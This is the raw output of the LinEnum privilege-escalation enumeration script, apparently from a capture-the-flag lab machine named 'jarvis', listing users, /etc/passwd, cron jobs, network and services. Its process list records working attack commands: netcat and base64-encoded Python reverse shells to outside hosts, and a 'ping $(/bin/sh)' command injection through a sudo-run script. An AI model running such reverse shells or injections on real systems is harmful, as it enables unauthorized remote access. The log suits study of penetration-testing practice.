
[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.971[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Fri Oct 11 13:09:08 EDT 2019
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 4.9.0-8-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.144-3.1 (2019-02-19)


[00;31m[-] Specific release information:[00m
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"


[00;31m[-] Hostname:[00m
jarvis


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)


[00;31m[-] Users that have previously logged onto the system:[00m
Username         Port     From             Latest
root             tty1                      Wed Aug  7 08:13:17 -0400 2019
pepper           pts/0    172.16.204.1     Tue Mar  5 10:23:48 -0500 2019


[00;31m[-] Who else is logged on:[00m
 13:09:08 up 11 min,  0 users,  load average: 0.01, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
uid=106(mysql) gid=112(mysql) groups=112(mysql)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x  3 root   root   4.0K Mar  2  2019 .
drwxr-xr-x 23 root   root   4.0K Mar  3  2019 ..
drwxr-xr-x  4 pepper pepper 4.0K Mar  5  2019 pepper


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
LANG=C
SUDO_GID=33
OLDPWD=/var/www/html
USERNAME=pepper
SUDO_COMMAND=/var/www/Admin-Utilities/simpler.py -p
USER=pepper
PWD=/tmp
HOME=/home/pepper
SUDO_USER=www-data
SUDO_UID=33
MAIL=/var/mail/pepper
SHELL=/bin/bash
TERM=unknown
SHLVL=1
LOGNAME=pepper
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env


[00;31m[-] Path information:[00m
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin


[00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


[00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx


[00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK		022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root  722 Oct  7  2017 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 Mar  2  2019 .
drwxr-xr-x 80 root root 4096 Aug  7 08:14 ..
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
-rw-r--r--  1 root root  712 Jan  1  2017 php

/etc/cron.daily:
total 44
drwxr-xr-x  2 root root 4096 Mar  4  2019 .
drwxr-xr-x 80 root root 4096 Aug  7 08:14 ..
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
-rwxr-xr-x  1 root root  539 Nov  3  2018 apache2
-rwxr-xr-x  1 root root 1474 Jan 18  2019 apt-compat
-rwxr-xr-x  1 root root  355 Oct 25  2016 bsdmainutils
-rwxr-xr-x  1 root root 1597 Jun 25  2018 dpkg
-rwxr-xr-x  1 root root 2211 Apr 13  2014 locate
-rwxr-xr-x  1 root root   89 May  5  2015 logrotate
-rwxr-xr-x  1 root root 1065 Dec 13  2016 man-db
-rwxr-xr-x  1 root root  249 May 17  2017 passwd

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar  2  2019 .
drwxr-xr-x 80 root root 4096 Aug  7 08:14 ..
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Mar  2  2019 .
drwxr-xr-x 80 root root 4096 Aug  7 08:14 ..
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x  2 root root 4096 Mar  2  2019 .
drwxr-xr-x 80 root root 4096 Aug  7 08:14 ..
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
-rwxr-xr-x  1 root root  723 Dec 13  2016 man-db


[00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[00;31m[-] Systemd timers:[00m
NEXT                         LEFT          LAST                         PASSED    UNIT                         ACTIVATES
Fri 2019-10-11 13:12:26 EDT  3min 14s left n/a                          n/a       systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Fri 2019-10-11 13:39:00 EDT  29min left    Fri 2019-10-11 13:09:00 EDT  12s ago   phpsessionclean.timer        phpsessionclean.service
Sat 2019-10-12 02:20:49 EDT  13h left      Fri 2019-10-11 12:57:29 EDT  11min ago apt-daily.timer              apt-daily.service
Sat 2019-10-12 06:12:49 EDT  17h left      Fri 2019-10-11 12:57:29 EDT  11min ago apt-daily-upgrade.timer      apt-daily-upgrade.service

4 timers listed.
[2mEnable thorough tests to see inactive timers[00m


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Network and IP info:[00m
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:50:56:b9:cd:fb brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.143/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:cdfb/64 scope global mngtmpaddr dynamic 
       valid_lft 86171sec preferred_lft 14171sec
    inet6 fe80::250:56ff:feb9:cdfb/64 scope link 
       valid_lft forever preferred_lft forever


[00;31m[-] ARP history:[00m
10.10.10.2 dev ens33 lladdr 00:50:56:aa:9c:8d REACHABLE
fe80::250:56ff:feaa:9c8d dev ens33 lladdr 00:50:56:aa:9c:8d router STALE


[00;31m[-] Nameserver(s):[00m
nameserver 1.1.1.1


[00;31m[-] Nameserver(s):[00m
Global
         DNS Servers: 1.1.1.1
          DNS Domain: localdomain
          DNSSEC NTA: 10.in-addr.arpa
                      16.172.in-addr.arpa
                      168.192.in-addr.arpa
                      17.172.in-addr.arpa
                      18.172.in-addr.arpa
                      19.172.in-addr.arpa
                      20.172.in-addr.arpa
                      21.172.in-addr.arpa
                      22.172.in-addr.arpa
                      23.172.in-addr.arpa
                      24.172.in-addr.arpa
                      25.172.in-addr.arpa
                      26.172.in-addr.arpa
                      27.172.in-addr.arpa
                      28.172.in-addr.arpa
                      29.172.in-addr.arpa
                      30.172.in-addr.arpa
                      31.172.in-addr.arpa
                      corp
                      d.f.ip6.arpa
                      home
                      internal
                      intranet
                      lan
                      local
                      private
                      test

Link 2 (ens33)
      Current Scopes: LLMNR/IPv4 LLMNR/IPv6
       LLMNR setting: yes
MulticastDNS setting: no
      DNSSEC setting: no
    DNSSEC supported: no


[00;31m[-] Default route:[00m
default via 10.10.10.2 dev ens33 onlink 


[00;31m[-] Listening TCP:[00m
State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
LISTEN     0      80     127.0.0.1:3306                     *:*                  
LISTEN     0      128          *:5355                     *:*                  
LISTEN     0      128          *:22                       *:*                  
LISTEN     0      128         :::64999                   :::*                  
LISTEN     0      128         :::5355                    :::*                  
LISTEN     0      128         :::80                      :::*                  
LISTEN     0      128         :::22                      :::*                  


[00;31m[-] Listening UDP:[00m
State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
UNCONN     0      0      127.0.0.53%lo:53                       *:*                  
UNCONN     0      0            *:5355                     *:*                  
UNCONN     0      0           :::5355                    :::*                  


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.1  0.6 138880  6768 ?        Ss   12:57   0:01 /sbin/init
root          2  0.0  0.0      0     0 ?        S    12:57   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    12:57   0:00 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   12:57   0:00 [kworker/0:0H]
root          7  0.0  0.0      0     0 ?        S    12:57   0:00 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    12:57   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    12:57   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S<   12:57   0:00 [lru-add-drain]
root         11  0.0  0.0      0     0 ?        S    12:57   0:00 [watchdog/0]
root         12  0.0  0.0      0     0 ?        S    12:57   0:00 [cpuhp/0]
root         13  0.0  0.0      0     0 ?        S    12:57   0:00 [kdevtmpfs]
root         14  0.0  0.0      0     0 ?        S<   12:57   0:00 [netns]
root         15  0.0  0.0      0     0 ?        S    12:57   0:00 [khungtaskd]
root         16  0.0  0.0      0     0 ?        S    12:57   0:00 [oom_reaper]
root         17  0.0  0.0      0     0 ?        S<   12:57   0:00 [writeback]
root         18  0.0  0.0      0     0 ?        S    12:57   0:00 [kcompactd0]
root         19  0.0  0.0      0     0 ?        SN   12:57   0:00 [ksmd]
root         21  0.0  0.0      0     0 ?        SN   12:57   0:00 [khugepaged]
root         22  0.0  0.0      0     0 ?        S<   12:57   0:00 [crypto]
root         23  0.0  0.0      0     0 ?        S<   12:57   0:00 [kintegrityd]
root         24  0.0  0.0      0     0 ?        S<   12:57   0:00 [bioset]
root         25  0.0  0.0      0     0 ?        S<   12:57   0:00 [kblockd]
root         26  0.0  0.0      0     0 ?        S<   12:57   0:00 [devfreq_wq]
root         27  0.0  0.0      0     0 ?        S<   12:57   0:00 [watchdogd]
root         28  0.0  0.0      0     0 ?        S    12:57   0:00 [kswapd0]
root         29  0.0  0.0      0     0 ?        S<   12:57   0:00 [vmstat]
root         41  0.0  0.0      0     0 ?        S<   12:57   0:00 [kthrotld]
root         42  0.0  0.0      0     0 ?        S<   12:57   0:00 [ipv6_addrconf]
root         75  0.0  0.0      0     0 ?        S<   12:57   0:00 [ata_sff]
root         76  0.0  0.0      0     0 ?        S<   12:57   0:00 [mpt_poll_0]
root         77  0.0  0.0      0     0 ?        S<   12:57   0:00 [mpt/0]
root         84  0.0  0.0      0     0 ?        S    12:57   0:00 [kworker/u256:1]
root        104  0.0  0.0      0     0 ?        S    12:57   0:00 [scsi_eh_0]
root        105  0.0  0.0      0     0 ?        S<   12:57   0:00 [scsi_tmf_0]
root        107  0.0  0.0      0     0 ?        S<   12:57   0:00 [bioset]
root        108  0.0  0.0      0     0 ?        S    12:57   0:00 [scsi_eh_1]
root        109  0.0  0.0      0     0 ?        S<   12:57   0:00 [scsi_tmf_1]
root        112  0.0  0.0      0     0 ?        S    12:57   0:00 [scsi_eh_2]
root        114  0.0  0.0      0     0 ?        S<   12:57   0:00 [scsi_tmf_2]
root        116  0.0  0.0      0     0 ?        S    12:57   0:00 [kworker/u256:2]
root        128  0.0  0.0      0     0 ?        S<   12:57   0:00 [bioset]
root        130  0.0  0.0      0     0 ?        S<   12:57   0:00 [kworker/0:1H]
root        156  0.0  0.0      0     0 ?        S<   12:57   0:00 [kworker/u257:0]
root        164  0.0  0.0      0     0 ?        S    12:57   0:00 [jbd2/sda1-8]
root        165  0.0  0.0      0     0 ?        S<   12:57   0:00 [ext4-rsv-conver]
root        193  0.0  1.0 207512 10580 ?        Ssl  12:57   0:00 /usr/bin/vmtoolsd
root        194  0.0  0.0      0     0 ?        S    12:57   0:00 [kauditd]
root        195  0.0  0.4  56800  4652 ?        Ss   12:57   0:00 /lib/systemd/systemd-journald
root        207  0.0  0.0      0     0 ?        S    12:57   0:00 [kworker/0:5]
root        217  0.0  0.4  46444  4592 ?        Ss   12:57   0:00 /lib/systemd/systemd-udevd
systemd+    301  0.0  0.4 127284  4152 ?        Ssl  12:57   0:00 /lib/systemd/systemd-timesyncd
root        325  0.0  0.0      0     0 ?        S<   12:57   0:00 [ttm_swap]
root        375  0.0  0.2  29664  2896 ?        Ss   12:57   0:00 /usr/sbin/cron -f
root        376  0.6  1.7 285256 17288 ?        Ss   12:57   0:04 python3 /root/sqli_defender.py
root        377  0.0  2.6 229376 26392 ?        Ss   12:57   0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
message+    381  0.0  0.3  45116  3880 ?        Ss   12:57   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root        385  0.0  0.0      0     0 ?        S<   12:57   0:00 [edac-poller]
root        386  0.0  0.3 250112  3048 ?        Ssl  12:57   0:00 /usr/sbin/rsyslogd -n
root        387  0.0  0.2  37980  2164 ?        Ss   12:57   0:00 /lib/systemd/systemd-logind
root        388  0.0  1.8 153488 18216 ?        Ss   12:57   0:00 /usr/bin/VGAuthService
root        395  0.0  0.1  14524  1556 tty1     Ss+  12:57   0:00 /sbin/agetty --noclear tty1 linux
www-data    506  0.0  0.6 229376  6328 ?        S    12:57   0:00 php-fpm: pool www
www-data    507  0.0  0.6 229376  6328 ?        S    12:57   0:00 php-fpm: pool www
root        539  0.0  0.5  69952  5428 ?        Ss   12:57   0:00 /usr/sbin/sshd -D
mysql       601  0.0  7.8 654228 79108 ?        Ssl  12:57   0:00 /usr/sbin/mysqld
root        603  0.0  2.5 271396 25496 ?        Ss   12:57   0:00 /usr/sbin/apache2 -k start
www-data    645  0.0  1.2 271772 12784 ?        S    12:57   0:00 /usr/sbin/apache2 -k start
www-data    783  0.0  1.2 271756 12696 ?        S    12:57   0:00 /usr/sbin/apache2 -k start
www-data    786  0.0  1.6 273724 16432 ?        S    12:58   0:00 /usr/sbin/apache2 -k start
www-data    790  0.0  1.3 271876 13188 ?        S    12:58   0:00 /usr/sbin/apache2 -k start
www-data    792  0.0  1.3 271860 13604 ?        S    12:58   0:00 /usr/sbin/apache2 -k start
www-data    793  0.0  1.8 273844 18272 ?        S    12:58   0:00 /usr/sbin/apache2 -k start
www-data    840  0.0  0.0   4276   792 ?        S    12:58   0:00 sh -c nc -e /bin/sh 10.10.13.60 4444 2>&1 
www-data    841  0.0  0.0   4276   708 ?        S    12:58   0:00 sh
www-data    861  0.0  1.6 273660 16568 ?        S    13:00   0:00 /usr/sbin/apache2 -k start
www-data    862  0.1  2.3 273888 23572 ?        S    13:00   0:00 /usr/sbin/apache2 -k start
www-data    863  0.0  1.4 273624 14268 ?        S    13:00   0:00 /usr/sbin/apache2 -k start
root        865  0.0  0.3  47608  3284 ?        S    13:01   0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper      866  0.0  0.8  26044  8900 ?        S    13:01   0:00 python3 /var/www/Admin-Utilities/simpler.py -p
www-data    867  0.0  0.0   4276   748 ?        S    13:01   0:00 sh -c python -c "exec('aW1wb3J0IHNvY2tldCAgICwgICBzdWJwcm9jZXNzICAgLCAgIG9zICAgICAgICA7ICAgICAgaG9zdD0iMTAuMTAuMTIuNjEiICAgICAgICA7ICAgICAgcG9ydD04ODg4ICAgICAgICA7ICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgIDsgICAgICBzLmNvbm5lY3QoKGhvc3QgICAsICAgcG9ydCkpICAgICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgIDApICAgICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgIDEpICAgICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgIDIpICAgICAgICA7ICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))" 2>&1 
www-data    868  0.0  1.0  40372 10464 ?        S    13:01   0:00 python -c exec('aW1wb3J0IHNvY2tldCAgICwgICBzdWJwcm9jZXNzICAgLCAgIG9zICAgICAgICA7ICAgICAgaG9zdD0iMTAuMTAuMTIuNjEiICAgICAgICA7ICAgICAgcG9ydD04ODg4ICAgICAgICA7ICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICAgIDsgICAgICBzLmNvbm5lY3QoKGhvc3QgICAsICAgcG9ydCkpICAgICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgIDApICAgICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgIDEpICAgICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgLCAgIDIpICAgICAgICA7ICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))
www-data    869  0.0  0.2  17956  2932 ?        S    13:01   0:00 /bin/bash
pepper      870  0.0  0.0   4276   748 ?        S    13:01   0:00 sh -c ping $(/bin/sh)
pepper      871  0.0  0.0   4276   712 ?        S    13:01   0:00 /bin/sh
pepper      872  0.0  0.1   4276  1420 ?        S    13:01   0:00 sh
www-data    880  0.0  2.3 275936 23436 ?        S    13:02   0:00 /usr/sbin/apache2 -k start
root        884  0.0  0.0      0     0 ?        S    13:02   0:00 [kworker/0:0]
www-data    891  0.0  0.0   1140   788 ?        S    13:03   0:00 /tmp/WUXPS
systemd+   1082  0.4  0.4  49620  4368 ?        Ss   13:07   0:00 /lib/systemd/systemd-resolved
root       1365  0.0  0.0      0     0 ?        S    13:07   0:00 [kworker/0:1]
www-data   1374  0.0  0.6  32176  6860 ?        S    13:08   0:00 python -c import pty;pty.spawn("/bin/bash")
www-data   1375  0.0  0.3  18160  3220 pts/0    Ss+  13:08   0:00 /bin/bash
www-data   1378  0.0  0.7 271420  7944 ?        S    13:08   0:00 /usr/sbin/apache2 -k start
www-data   1379  0.0  0.7 271420  7944 ?        S    13:08   0:00 /usr/sbin/apache2 -k start
www-data   1380  0.0  0.7 271420  7944 ?        S    13:08   0:00 /usr/sbin/apache2 -k start
root       1455  0.0  0.0      0     0 ?        S    13:08   0:00 [kworker/u256:0]
pepper     1459  0.1  0.3  10468  3464 ?        S    13:09   0:00 /bin/bash ./LinEnum.sh
pepper     1460  0.1  0.3  10512  3360 ?        S    13:09   0:00 /bin/bash ./LinEnum.sh
pepper     1461  0.0  0.0   4188   616 ?        S    13:09   0:00 tee -a
pepper     1633  0.0  0.2  10496  2728 ?        S    13:09   0:00 /bin/bash ./LinEnum.sh
pepper     1634  0.0  0.2  36632  2800 ?        R    13:09   0:00 ps aux


[00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root  1099016 May 15  2017 /bin/bash
lrwxrwxrwx 1 root root        4 Jan 24  2017 /bin/sh -> dash
-rwxr-xr-x 1 root root   121256 Feb 17  2019 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root   207336 Feb 17  2019 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root   321952 Feb 17  2019 /lib/systemd/systemd-resolved
-rwxr-xr-x 1 root root    39248 Feb 17  2019 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root   465680 Feb 17  2019 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root    57680 Mar  7  2018 /sbin/agetty
lrwxrwxrwx 1 root root       20 Feb 17  2019 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root   152232 Jul 25  2017 /usr/bin/VGAuthService
-rwxr-xr-x 1 root root   224208 Mar  2  2018 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root    48656 Jul 25  2017 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root   666760 Nov  3  2018 /usr/sbin/apache2
-rwxr-xr-x 1 root root    48616 Oct  7  2017 /usr/sbin/cron
-rwxr-xr-x 1 root root 17816520 Aug  8  2018 /usr/sbin/mysqld
-rwxr-xr-x 1 root root   651576 Jan 18  2017 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root   791024 Mar  1  2019 /usr/sbin/sshd


[00;31m[-] /etc/init.d/ binary permissions:[00m
total 104
drwxr-xr-x  2 root root 4096 Aug  7 08:14 .
drwxr-xr-x 80 root root 4096 Aug  7 08:14 ..
-rwxr-xr-x  1 root root 2489 Nov  3  2018 apache-htcacheclean
-rwxr-xr-x  1 root root 8181 Nov  3  2018 apache2
-rwxr-xr-x  1 root root 1232 Apr  6  2017 console-setup.sh
-rwxr-xr-x  1 root root 3049 Oct  7  2017 cron
-rwxr-xr-x  1 root root 2813 Mar  2  2018 dbus
-rwxr-xr-x  1 root root 3809 Mar  7  2018 hwclock.sh
-rwxr-xr-x  1 root root 1479 May 18  2016 keyboard-setup.sh
-rwxr-xr-x  1 root root 2044 Dec 25  2016 kmod
-rwxr-xr-x  1 root root 5930 Aug 10  2017 mysql
-rwxr-xr-x  1 root root 4597 Sep 16  2016 networking
-rwxr-xr-x  1 root root 1846 Jul 25  2017 open-vm-tools
-rwxr-xr-x  1 root root 4793 Feb 25  2019 php7.0-fpm
-rwxr-xr-x  1 root root 1191 May 17  2018 procps
-rwxr-xr-x  1 root root 4355 Dec 10  2017 rsync
-rwxr-xr-x  1 root root 2868 Jan 18  2017 rsyslog
-rwxr-xr-x  1 root root 4033 Mar  1  2019 ssh
-rwxr-xr-x  1 root root  731 Jun  5  2017 sudo
-rwxr-xr-x  1 root root 6087 Jan 15  2019 udev


[00;31m[-] /etc/init/ config file permissions:[00m
total 44
drwxr-xr-x  2 root root 4096 Mar  4  2019 .
drwxr-xr-x 80 root root 4096 Aug  7 08:14 ..
-rw-r--r--  1 root root  530 Jun  2  2015 network-interface-container.conf
-rw-r--r--  1 root root 1756 Jun  2  2015 network-interface-security.conf
-rw-r--r--  1 root root  933 Jun  2  2015 network-interface.conf
-rw-r--r--  1 root root 2493 Jun  2  2015 networking.conf
-rw-r--r--  1 root root  448 Feb 25  2019 php7.0-fpm.conf
-rw-r--r--  1 root root  637 Mar  1  2019 ssh.conf
-rw-r--r--  1 root root  337 Jan 15  2019 udev.conf
-rw-r--r--  1 root root  360 Jan 15  2019 udevmonitor.conf
-rw-r--r--  1 root root  352 Jan 15  2019 udevtrigger.conf


[00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 5.3M
drwxr-xr-x 20 root root  36K Aug  7 08:14 system
drwxr-xr-x  2 root root 4.0K Mar  2  2019 system-sleep
drwxr-xr-x  2 root root 4.0K Mar  2  2019 network
drwxr-xr-x  2 root root 4.0K Mar  2  2019 system-generators
drwxr-xr-x  2 root root 4.0K Mar  2  2019 system-preset
-rw-r--r--  1 root root 2.2M Feb 17  2019 libsystemd-shared-232.so
-rw-r--r--  1 root root  484 Feb 17  2019 resolv.conf
-rwxr-xr-x  1 root root 1.1M Feb 17  2019 systemd
-rwxr-xr-x  1 root root 6.3K Feb 17  2019 systemd-ac-power
-rwxr-xr-x  1 root root  19K Feb 17  2019 systemd-backlight
-rwxr-xr-x  1 root root  11K Feb 17  2019 systemd-binfmt
-rwxr-xr-x  1 root root  11K Feb 17  2019 systemd-cgroups-agent
-rwxr-xr-x  1 root root  27K Feb 17  2019 systemd-cryptsetup
-rwxr-xr-x  1 root root  19K Feb 17  2019 systemd-fsck
-rwxr-xr-x  1 root root  23K Feb 17  2019 systemd-fsckd
-rwxr-xr-x  1 root root  11K Feb 17  2019 systemd-hibernate-resume
-rwxr-xr-x  1 root root  23K Feb 17  2019 systemd-hostnamed
-rwxr-xr-x  1 root root  15K Feb 17  2019 systemd-initctl
-rwxr-xr-x  1 root root 119K Feb 17  2019 systemd-journald
-rwxr-xr-x  1 root root  35K Feb 17  2019 systemd-localed
-rwxr-xr-x  1 root root 203K Feb 17  2019 systemd-logind
-rwxr-xr-x  1 root root  15K Feb 17  2019 systemd-modules-load
-rwxr-xr-x  1 root root 415K Feb 17  2019 systemd-networkd
-rwxr-xr-x  1 root root  19K Feb 17  2019 systemd-networkd-wait-online
-rwxr-xr-x  1 root root  11K Feb 17  2019 systemd-quotacheck
-rwxr-xr-x  1 root root  11K Feb 17  2019 systemd-random-seed
-rwxr-xr-x  1 root root  15K Feb 17  2019 systemd-remount-fs
-rwxr-xr-x  1 root root  11K Feb 17  2019 systemd-reply-password
-rwxr-xr-x  1 root root 315K Feb 17  2019 systemd-resolved
-rwxr-xr-x  1 root root  19K Feb 17  2019 systemd-rfkill
-rwxr-xr-x  1 root root  39K Feb 17  2019 systemd-shutdown
-rwxr-xr-x  1 root root  15K Feb 17  2019 systemd-sleep
-rwxr-xr-x  1 root root  23K Feb 17  2019 systemd-socket-proxyd
-rwxr-xr-x  1 root root  15K Feb 17  2019 systemd-sysctl
-rwxr-xr-x  1 root root 1.3K Feb 17  2019 systemd-sysv-install
-rwxr-xr-x  1 root root  27K Feb 17  2019 systemd-timedated
-rwxr-xr-x  1 root root  39K Feb 17  2019 systemd-timesyncd
-rwxr-xr-x  1 root root 455K Feb 17  2019 systemd-udevd
